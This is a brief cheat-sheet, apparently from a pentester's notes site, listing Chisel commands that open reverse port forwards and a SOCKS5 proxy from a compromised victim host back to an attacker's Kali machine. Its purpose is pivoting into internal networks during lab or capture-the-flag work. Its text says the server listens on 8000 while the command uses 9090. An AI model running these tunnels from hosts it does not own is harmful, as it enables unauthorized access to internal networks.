Skip to content

Chisel - SOCKS5 Port forwarding - Linux

  • KALI: 10.10.14.3
  • VICT: 10.10.10.10
  • OTHE: 10.10.10.240

On Kali - Start server listening on 8000


./chisel.elf server -p 9090 --reverse

On VICT - Listen on Kali 80, forward to localhost port 80 on client


./chisel.elf client 10.10.14.3:9090 R:80:127.0.0.1:80

On VICT - Listen on Kali 4444, forward to 10.10.10.240 port 80


./chisel.elf client 10.10.14.3:9090 R:4444:10.10.10.240:80

On VICT - Create SOCKS5 listener on 1080 on Kali, proxy through client

./chisel.elf client 10.10.14.3:9090 R:socks

  • https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html